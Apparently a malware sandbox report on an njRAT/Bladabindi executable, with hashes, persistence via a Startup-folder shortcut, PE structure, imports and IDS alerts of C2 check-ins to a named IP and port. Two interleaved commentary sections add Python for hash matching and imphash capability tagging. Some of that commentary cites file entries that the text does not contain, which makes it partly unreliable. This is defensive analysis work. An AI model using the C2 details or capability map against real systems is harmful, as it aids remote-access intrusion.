SHA-512: | F3CA77CEBD03A66D83BB12C9CA53DE14756F39E2EA76598413DCDE5AA70712005876469DDD297C48C47E17C259FE8640D53F350688F13D072517E405859889B1 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\PKVJK6R4786INHH74LL9.temp
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 6045 |
Entropy (8bit): | 3.5897762024878896 |
Encrypted: | false |
SSDEEP: | 96:HbhQCwO4IyqvsqvJCwo1etn5/bHWdkn5/bHydf:HbWCo1et9Kdk9udf |
MD5: | 9441DDC3CCCBF7C0B5A921C96BB2FB49 |
SHA1: | A77B0A1A047995EE2C62828AD9F03BB64B3C1CC9 |
SHA-256: | 487D5CD7B88EA3B2DEFE1E836ADD74DA3DBD8C2D8235E27EACA38C621A8FCD45 |
SHA-512: | F3CA77CEBD03A66D83BB12C9CA53DE14756F39E2EA76598413DCDE5AA70712005876469DDD297C48C47E17C259FE8640D53F350688F13D072517E405859889B1 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\TT2NP7KQGD8NJDGHFW0B.temp
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 6045 |
Entropy (8bit): | 3.5897762024878896 |
Encrypted: | false |
SSDEEP: | 96:HbhQCwO4IyqvsqvJCwo1etn5/bHWdkn5/bHydf:HbWCo1et9Kdk9udf |
MD5: | 9441DDC3CCCBF7C0B5A921C96BB2FB49 |
SHA1: | A77B0A1A047995EE2C62828AD9F03BB64B3C1CC9 |
SHA-256: | 487D5CD7B88EA3B2DEFE1E836ADD74DA3DBD8C2D8235E27EACA38C621A8FCD45 |
SHA-512: | F3CA77CEBD03A66D83BB12C9CA53DE14756F39E2EA76598413DCDE5AA70712005876469DDD297C48C47E17C259FE8640D53F350688F13D072517E405859889B1 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft.lnk
Process: | C:\Users\user\Desktop\._cache_1.exe |
File Type: | |
Category: | modified |
Size (bytes): | 989 |
Entropy (8bit): | 4.740025030042471 |
Encrypted: | false |
SSDEEP: | 12:8m6stk1g4cB8Cr4016WbWsMR+/GkT04IipuRS1l1Q1SwuG3YilMMEpxRljK6Tdza:8mNt8W8EKsMR5SpuUvqkw3qfk7N |
MD5: | AA4F9419DC20439A76EE7C5970F52BAD |
SHA1: | E7DE470815B816CAEEA8032096F6CD0BF07587AE |
SHA-256: | DBE92079821CC3FC3471F6C641617320FDD9BE5078E258C60CCB576BAE2AAB42 |
SHA-512: | A65C967C0E6E7AD920C4C139459ADB712B6ABCBE971F2D34403761E5F46F7653E440D3A342C847DD69032F9D060FD08EBA9BD7FA68087E2733F04F8F4C0C4A41 |
Malicious: | false |
Preview: |
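The hash fields reported for the 1-byte file dropped by powershell.exe are enough to recover its content without the file itself. The following Python is an added example, not code from the sandbox report: it brute-forces a handful of plausible one-byte contents against the reported MD5/SHA1/SHA-256 (copied from the entry above) and re-derives the 8-bit entropy figure the report prints. The candidate list is constructed for the example; nothing in it comes from the sample.

```python
"""Added example, not code from the sandbox report: recover the content of a
tiny dropped file from its reported digests and re-derive its entropy figure."""
import hashlib
import math
from typing import Dict, Iterable, Optional

# Digests copied from the report entry for the 1-byte file dropped by powershell.exe.
REPORTED_1BYTE: Dict[str, str] = {
    "md5": "C4CA4238A0B923820DCC509A6F75849B",
    "sha1": "356A192B7913B04C54574D18C28D46E6395428AB",
    "sha256": "6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B",
}


def digests(data: bytes) -> Dict[str, str]:
    """MD5/SHA1/SHA-256 of a blob, lower-case hex, the same fields the report prints."""
    return {
        "md5": hashlib.md5(data).hexdigest(),
        "sha1": hashlib.sha1(data).hexdigest(),
        "sha256": hashlib.sha256(data).hexdigest(),
    }


def shannon_entropy(data: bytes) -> float:
    """8-bit Shannon entropy in bits per byte (0.0 for one distinct byte value, 8.0 max)."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def identify(reported: Dict[str, str], candidates: Iterable[bytes]) -> Optional[bytes]:
    """Return the first candidate whose digests all equal the reported ones."""
    want = {k: v.lower() for k, v in reported.items()}
    for cand in candidates:
        if digests(cand) == want:
            return cand
    return None


# Constructed guesses for a one-byte marker file: ASCII digits, a few flag
# letters, NUL, newline and space. Nothing here is taken from the sample itself.
CANDIDATES = [bytes([c]) for c in b"0123456789"] + [b"\x00", b"Y", b"N", b"\n", b" "]

if __name__ == "__main__":
    hit = identify(REPORTED_1BYTE, CANDIDATES)
    print("1-byte dropped file content:", hit)
    print("entropy:", shannon_entropy(hit) if hit is not None else "n/a")
```

The match is the ASCII digit "1", which is consistent with the reported entropy of 0.0 (a file with a single distinct byte value has zero entropy regardless of length). The same trick does not scale to the 26-byte file above without a hypothesis about its format; for that one the entropy of 3.95 bits per byte only says it is short plain text or similar low-alphabet data, not compressed or encrypted.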
File type: | |
Entropy (8bit): | 7.456452138313528 |
TrID: |
File name: | ._cache_1.exe |
File size: | 1'178'304 bytes |
MD5: | 62c01f1b2ac0a7bab6c3b50fd51e6a36 |
SHA1: | cfc301a04b9a4ffeb0dc4578c1998a4eb4754f7b |
SHA256: | c46a631f0bc82d8c2d46e9d8634cc50242987fa7749cac097439298d1d0c1d6e |
SHA512: | 6617b2723526a8f569d796352e21fb902d1db76dd3a3c6b6562915a7fb087b7e65871921fcdc97871b302d77efa0b60d63872bb0b8bae4a7d982486428cd43ab |
SSDEEP: | 24576:HRmJkcoQricOIQxiZY1iagI+bpJBIAkPcJCqbVvi1N:sJZoQrbTFZY1iagTpVkybVqT |
TLSH: | 4E45E122F9C68036C2B327B19E7EF76A963D69370327D19727C82D315EA05416B39723 |
File Content Preview: | MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........................1b.......P.).....Q.......y.......i..........}....N.......d.......`.......m.......g.....Rich............PE..L.. |
Icon Hash: | 69b45d29924d0b06 |
Entrypoint: | 0x4165c1 |
Entrypoint Section: | .text |
Digitally signed: | false |
Imagebase: | 0x400000 |
Subsystem: | windows gui |
Image File Characteristics: | RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE |
DLL Characteristics: | TERMINAL_SERVER_AWARE |
Time Stamp: | 0x4F25BAEC [Sun Jan 29 21:32:28 2012 UTC] |
TLS Callbacks: | |
CLR (.Net) Version: | |
OS Version Major: | 5 |
OS Version Minor: | 0 |
File Version Major: | 5 |
File Version Minor: | 0 |
Subsystem Version Major: | 5 |
Subsystem Version Minor: | 0 |
Import Hash: | d3bf8a7746a8d1ee8f6e5960c3f69378 |
Instruction |
---|
call 00007FE8BC7CAF6Bh |
jmp 00007FE8BC7C1DDEh |
int3 |
int3 |
int3 |
int3 |
int3 |
push ebp |
mov ebp, esp |
push edi |
push esi |
mov esi, dword ptr [ebp+0Ch] |
mov ecx, dword ptr [ebp+10h] |
mov edi, dword ptr [ebp+08h] |
mov eax, ecx |
mov edx, ecx |
add eax, esi |
cmp edi, esi |
jbe 00007FE8BC7C1F5Ah |
cmp edi, eax |
jc 00007FE8BC7C20F6h |
cmp ecx, 00000080h |
jc 00007FE8BC7C1F6Eh |
cmp dword ptr [004A9724h], 00000000h |
je 00007FE8BC7C1F65h |
push edi |
push esi |
and edi, 0Fh |
and esi, 0Fh |
cmp edi, esi |
pop esi |
pop edi |
jne 00007FE8BC7C1F57h |
jmp 00007FE8BC7C2332h |
test edi, 00000003h |
jne 00007FE8BC7C1F66h |
shr ecx, 02h |
and edx, 03h |
cmp ecx, 08h |
jc 00007FE8BC7C1F7Bh |
rep movsd |
jmp dword ptr [00416740h+edx*4] |
mov eax, edi |
mov edx, 00000003h |
sub ecx, 04h |
jc 00007FE8BC7C1F5Eh |
and eax, 03h |
add ecx, eax |
jmp dword ptr [00416654h+eax*4] |
jmp dword ptr [00416750h+ecx*4] |
nop |
jmp dword ptr [004166D4h+ecx*4] |
nop |
inc cx |
add byte ptr [eax-4BFFBE9Ah], dl |
inc cx |
add byte ptr [ebx], ah |
ror dword ptr [edx-75F877FAh], 1 |
inc esi |
add dword ptr [eax+468A0147h], ecx |
add al, cl |
jmp 00007FE8BEC3A757h |
add esi, 03h |
add edi, 03h |
cmp ecx, 08h |
jc 00007FE8BC7C1F1Eh |
rep movsd |
jmp dword ptr [00000000h+edx*4] |
Programming Language: |
Name | Virtual Address | Virtual Size | Is in Section |
---|---|---|---|
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x8d41c | 0x154 | .rdata |
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xab000 | 0x34b8 | .rsrc |
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_IAT | 0x82000 | 0x844 | .rdata |
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics |
---|---|---|---|---|---|---|---|---|---|
.text | 0x1000 | 0x8061c | 0x80800 | 61ffce4768976fa0dd2a8f6a97b1417a | False | 0.5583182605787937 | data | 6.684690148171278 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ |
.rdata | 0x82000 | 0xdfc0 | 0xe000 | 0354bc5f2376b5e9a4a3ba38b682dff1 | False | 0.36085728236607145 | data | 4.799741132252136 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
.data | 0x90000 | 0x1a758 | 0x6800 | 8033f5a38941b4685bc2299e78f31221 | False | 0.15324519230769232 | data | 2.1500715391677487 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
.rsrc | 0xab000 | 0x34b8 | 0x3600 | 2e5ce065e7be297f382500898f0288da | False | 0.24811921296296297 | data | 3.387310935125315 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
Name | RVA | Size | Type | Language | Country | ZLIB Complexity |
---|---|---|---|---|---|---|
RT_ICON | 0xab448 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colors | English | Great Britain | 0.3277027027027027 |
RT_ICON | 0xab570 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.7466216216216216 |
RT_ICON | 0xab698 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.3885135135135135 |
RT_ICON | 0xab7c0 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 320 | English | Great Britain | 0.10549132947976879 |
RT_MENU | 0xabd28 | 0x50 | data | English | Great Britain | 0.9 |
RT_DIALOG | 0xabd78 | 0xfc | data | English | Great Britain | 0.6507936507936508 |
RT_STRING | 0xabe78 | 0x530 | data | English | Great Britain | 0.33960843373493976 |
RT_STRING | 0xac3a8 | 0x690 | data | English | Great Britain | 0.26964285714285713 |
RT_STRING | 0xaca38 | 0x4d0 | data | English | Great Britain | 0.36363636363636365 |
RT_STRING | 0xacf08 | 0x5fc | data | English | Great Britain | 0.3087467362924282 |
RT_STRING | 0xad508 | 0x65c | data | English | Great Britain | 0.34336609336609336 |
RT_STRING | 0xadb68 | 0x388 | data | English | Great Britain | 0.377212389380531 |
RT_STRING | 0xadef0 | 0x158 | Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0 | English | United States | 0.502906976744186 |
RT_GROUP_ICON | 0xae048 | 0x14 | data | English | Great Britain | 1.15 |
RT_GROUP_ICON | 0xae060 | 0x14 | data | English | Great Britain | 1.15 |
RT_GROUP_ICON | 0xae078 | 0x14 | data | English | Great Britain | 1.25 |
RT_GROUP_ICON | 0xae090 | 0x14 | data | English | Great Britain | 1.25 |
RT_VERSION | 0xae0a8 | 0x19c | data | English | Great Britain | 0.5339805825242718 |
RT_MANIFEST | 0xae248 | 0x26c | ASCII text, with CRLF line terminators | English | United States | 0.5145161290322581 |
DLL | Import |
---|---|
WSOCK32.dll | __WSAFDIsSet, setsockopt, ntohs, recvfrom, sendto, htons, select, listen, WSAStartup, bind, closesocket, connect, socket, send, WSACleanup, ioctlsocket, accept, WSAGetLastError, inet_addr, gethostbyname, gethostname, recv |
VERSION.dll | VerQueryValueW, GetFileVersionInfoW, GetFileVersionInfoSizeW |
WINMM.dll | timeGetTime, waveOutSetVolume, mciSendStringW |
COMCTL32.dll | ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, ImageList_ReplaceIcon, ImageList_Create, InitCommonControlsEx, ImageList_Destroy |
MPR.dll | WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W, WNetUseConnectionW |
WININET.dll | InternetReadFile, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetConnectW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetQueryOptionW, InternetQueryDataAvailable |
PSAPI.DLL | EnumProcesses, GetModuleBaseNameW, GetProcessMemoryInfo, EnumProcessModules |
USERENV.dll | CreateEnvironmentBlock, DestroyEnvironmentBlock, UnloadUserProfile, LoadUserProfileW |
KERNEL32.dll | HeapAlloc, Sleep, GetCurrentThreadId, RaiseException, MulDiv, GetVersionExW, GetSystemInfo, InterlockedIncrement, InterlockedDecrement, WideCharToMultiByte, lstrcpyW, MultiByteToWideChar, lstrlenW, lstrcmpiW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, DeleteFileW, FindNextFileW, MoveFileW, CopyFileW, CreateDirectoryW, RemoveDirectoryW, GetProcessHeap, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetLocalTime, CompareStringW, DeleteCriticalSection, EnterCriticalSection, LeaveCriticalSection, InitializeCriticalSectionAndSpinCount, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, GetTempPathW, GetTempFileNameW, VirtualFree, FormatMessageW, GetExitCodeProcess, SetErrorMode, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, DeviceIoControl, SetFileAttributesW, GetShortPathNameW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetCurrentThread, GetProcessIoCounters, CreateProcessW, SetPriorityClass, LoadLibraryW, VirtualAlloc, LoadLibraryExW, HeapFree, WaitForSingleObject, CreateThread, DuplicateHandle, GetLastError, CloseHandle, GetCurrentProcess, GetProcAddress, LoadLibraryA, FreeLibrary, GetModuleFileNameW, GetFullPathNameW, SetCurrentDirectoryW, IsDebuggerPresent, GetCurrentDirectoryW, ExitProcess, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetTimeFormatW, GetDateFormatW, GetCommandLineW, GetStartupInfoW, IsProcessorFeaturePresent, HeapSize, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStringTypeW, HeapCreate, SetHandleCount, GetFileType, SetStdHandle, GetConsoleCP, GetConsoleMode, LCMapStringW, RtlUnwind, SetFilePointer, GetTimeZoneInformation, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetTickCount, HeapReAlloc, WriteConsoleW, SetEndOfFile, SetSystemPowerState, SetEnvironmentVariableA |
USER32.dll | GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, ReleaseCapture, SetCapture, WindowFromPoint, LoadImageW, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, CheckMenuRadioItem, SetWindowPos, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, SystemParametersInfoW, TranslateMessage, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, GetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, MessageBoxW, DefWindowProcW, CopyImage, AdjustWindowRectEx, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, GetMenuItemID, DispatchMessageW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, PeekMessageW, UnregisterHotKey, CharLowerBuffW, keybd_event, MonitorFromRect, GetWindowThreadProcessId |
GDI32.dll | DeleteObject, AngleArc, GetTextExtentPoint32W, ExtCreatePen, StrokeAndFillPath, StrokePath, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, GetDeviceCaps, MoveToEx, DeleteDC, GetPixel, CreateDCW, Ellipse, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, GetStockObject, LineTo |
COMDLG32.dll | GetSaveFileNameW, GetOpenFileNameW |
ADVAPI32.dll | RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegCreateKeyExW, GetUserNameW, RegConnectRegistryW, CloseServiceHandle, UnlockServiceDatabase, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, InitializeSecurityDescriptor, InitializeAcl, GetLengthSid, CopySid, LogonUserW, LockServiceDatabase, GetTokenInformation, GetSecurityDescriptorDacl, GetAclInformation, GetAce, AddAce, SetSecurityDescriptorDacl, RegOpenKeyExW, RegQueryValueExW, AdjustTokenPrivileges, InitiateSystemShutdownExW, OpenSCManagerW, RegCloseKey |
SHELL32.dll | DragQueryPoint, ShellExecuteExW, SHGetFolderPathW, DragQueryFileW, SHEmptyRecycleBinW, SHBrowseForFolderW, SHFileOperationW, SHGetPathFromIDListW, SHGetDesktopFolder, SHGetMalloc, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish |
ole32.dll | OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CLSIDFromString, StringFromGUID2, CoInitialize, CoUninitialize, CoCreateInstance, CreateStreamOnHGlobal, CoTaskMemAlloc, CoTaskMemFree, ProgIDFromCLSID, OleInitialize, CreateBindCtx, CLSIDFromProgID, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket, OleUninitialize, IIDFromString |
OLEAUT32.dll | VariantChangeType, VariantCopyInd, DispCallFunc, CreateStdDispatch, CreateDispTypeInfo, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SysStringLen, SafeArrayAllocData, GetActiveObject, QueryPathOfRegTypeLib, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, SysAllocString, VariantCopy, VariantClear, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, OleLoadPicture, SafeArrayAccessData, VariantInit |
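The Import Hash field in the static summary above is an imphash: an MD5 over the normalised "library.function" list taken in import-table order. The following Python is an added example of my own (not code from the report or from the pefile project) that reproduces that normalisation over rows in the report's "DLL | Import" format and tags the import set with coarse capabilities. The rows embedded below are a constructed subset of the table above, so the hash it prints will not equal the report's d3bf8a7746a8d1ee8f6e5960c3f69378; to compare, feed the complete table in file order. The capability grouping and its thresholds are my own choices.

```python
"""Added example, not code from the report or from pefile: imphash
normalisation and capability tagging over 'DLL | Import' rows."""
import hashlib
import re
from typing import Dict, List, Set, Tuple

# Constructed subset of the report's import table, in the page's row format.
IMPORT_ROWS = """\
WSOCK32.dll | WSAStartup, connect, socket, send, recv, closesocket |
KERNEL32.dll | OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateToolhelp32Snapshot, IsDebuggerPresent, CreateProcessW |
USER32.dll | GetAsyncKeyState, GetKeyboardState, keybd_event, mouse_event, BlockInput, GetClipboardData, SetClipboardData |
ADVAPI32.dll | AdjustTokenPrivileges, CreateProcessAsUserW, LogonUserW, RegSetValueExW |
"""

Row = Tuple[str, List[str]]


def parse_import_rows(text: str) -> List[Row]:
    """Split 'DLL | f1, f2, ... |' rows into (dll, [functions]); skips header/separator lines."""
    rows: List[Row] = []
    for line in text.splitlines():
        dll, sep, funcs = line.partition(" | ")
        if not sep or dll.strip() in ("DLL", "---"):
            continue
        names = [f.strip() for f in funcs.strip(" |").split(",") if f.strip()]
        rows.append((dll.strip(), names))
    return rows


def imphash_string(rows: List[Row]) -> str:
    """pefile-style normalisation: library lower-cased with .dll/.ocx/.sys
    stripped, function lower-cased, joined as 'lib.func' with commas in
    import-table order. Imports by ordinal would appear as 'ordN' (or a
    resolved name for a few well-known libraries); the report lists names only."""
    parts = []
    for dll, funcs in rows:
        lib = re.sub(r"\.(dll|ocx|sys)$", "", dll.lower())
        parts.extend(f"{lib}.{f.lower()}" for f in funcs)
    return ",".join(parts)


def imphash(rows: List[Row]) -> str:
    return hashlib.md5(imphash_string(rows).encode()).hexdigest()


# My own coarse capability map: tag -> (minimum distinct hits, API names).
CAPABILITIES: Dict[str, Tuple[int, Set[str]]] = {
    "process-injection": (3, {"openprocess", "virtualallocex", "writeprocessmemory", "createremotethread"}),
    "keylogging":        (2, {"getasynckeystate", "getkeyboardstate", "getkeystate", "setwindowshookexw"}),
    "input-control":     (2, {"keybd_event", "mouse_event", "blockinput", "sendinput"}),
    "clipboard":         (2, {"getclipboarddata", "setclipboarddata", "openclipboard"}),
    "network-socket":    (3, {"wsastartup", "socket", "connect", "send", "recv"}),
    "token-abuse":       (2, {"adjusttokenprivileges", "createprocessasuserw", "logonuserw", "duplicatetokenex"}),
    "anti-debug":        (1, {"isdebuggerpresent", "checkremotedebuggerpresent"}),
}


def capabilities(rows: List[Row]) -> Dict[str, List[str]]:
    """Tags whose API threshold is met by the import set, with the matching names."""
    present = {f.lower() for _, funcs in rows for f in funcs}
    found: Dict[str, List[str]] = {}
    for tag, (min_hits, apis) in CAPABILITIES.items():
        hits = sorted(present & apis)
        if len(hits) >= min_hits:
            found[tag] = hits
    return found


if __name__ == "__main__":
    rows = parse_import_rows(IMPORT_ROWS)
    print("imphash (subset only):", imphash(rows))
    for tag, hits in capabilities(rows).items():
        print(f"{tag:18} {', '.join(hits)}")
```

Two caveats when reading the tags. Imphash pivots only work across samples built with the same toolchain and import layout, so treat a match as a lead, not an identity. And a large general-purpose import set like the one above (window management, multimedia, clipboard, input simulation, power control, all in one 32-bit binary) describes what the runtime embedded in the executable can reach, not necessarily what its payload does; the dynamic findings on this page, the Startup-folder .lnk and the repeated port-1177 check-ins, carry more weight than any single imported API.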
Language of compilation system | Country where language is spoken |
---|---|
English | Great Britain |
English | United States |
Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|---|---|---|
07/01/24-10:22:43.879655 | TCP | 2017419 | ET TROJAN Bladabindi/njrat CnC Checkin | 49166 | 1177 | 192.168.2.22 | 192.169.69.25 |
07/01/24-10:25:00.126873 | TCP | 2017419 | ET TROJAN Bladabindi/njrat CnC Checkin | 49176 | 1177 | 192.168.2.22 | 192.169.69.25 |
07/01/24-10:24:33.177434 | TCP | 2017419 | ET TROJAN Bladabindi/njrat CnC Checkin | 49174 | 1177 | 192.168.2.22 | 192.169.69.25 |
07/01/24-10:25:27.489939 | TCP | 2017419 | ET TROJAN Bladabindi/njrat CnC Checkin | 49178 | 1177 | 192.168.2.22 | 192.169.69.25 |
07/01/24-10:23:24.901144 | TCP | 2017419 | ET TROJAN Bladabindi/njrat CnC Checkin | 49169 | 1177 | 192.168.2.22 | 192.169.69.25 |
07/01/24-10:24:19.571508 | TCP | 2017419 | ET TROJAN Bladabindi/njrat CnC Checkin | 49173 | 1177 | 192.168.2.22 | 192.169.69.25 |
07/01/24-10:22:30.431063 | TCP | 2017419 | ET TROJAN Bladabindi/njrat CnC Checkin | 49165 | 1177 | 192.168.2.22 | 192.169.69.25 |
07/01/24-10:23:52.503013 | TCP | 2017419 | ET TROJAN Bladabindi/njrat CnC Checkin | 49171 | 1177 | 192.168.2.22 | 192.169.69.25 |
07/01/24-10:22:03.684189 | TCP | 2017419 | ET TROJAN Bladabindi/njrat CnC Checkin | 49163 | 1177 | 192.168.2.22 | 192.169.69.25 |
07/01/24-10:23:38.664413 | TCP | 2017419 | ET TROJAN Bladabindi/njrat CnC Checkin | 49170 | 1177 | 192.168.2.22 | 192.169.69.25 |
07/01/24-10:22:57.541620 | TCP | 2017419 | ET TROJAN Bladabindi/njrat CnC Checkin | 49167 | 1177 | 192.168.2.22 | 192.169.69.25 |
07/01/24-10:24:46.813104 | TCP | 2017419 | ET TROJAN Bladabindi/njrat CnC Checkin | 49175 | 1177 | 192.168.2.22 | 192.169.69.25 |
07/01/24-10:25:13.886977 | TCP | 2017419 | ET TROJAN Bladabindi/njrat CnC Checkin | 49177 | 1177 | 192.168.2.22 | 192.169.69.25 |
07/01/24-10:24:06.132111 | TCP | 2017419 | ET TROJAN Bladabindi/njrat CnC Checkin | 49172 | 1177 | 192.168.2.22 | 192.169.69.25 |
07/01/24-10:21:49.438511 | TCP | 2017419 | ET TROJAN Bladabindi/njrat CnC Checkin | 49162 | 1177 | 192.168.2.22 | 192.169.69.25 |
07/01/24-10:23:11.211027 | TCP | 2017419 | ET TROJAN Bladabindi/njrat CnC Checkin | 49168 | 1177 | 192.168.2.22 | 192.169.69.25 |
07/01/24-10:22:16.980393 | TCP | 2017419 | ET TROJAN Bladabindi/njrat CnC Checkin | 49164 | 1177 | 192.168.2.22 | 192.169.69.25 |
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Jul 1, 2024 10:21:49.233390093 CEST | 49162 | 1177 | 192.168.2.22 | 192.169.69.25 |
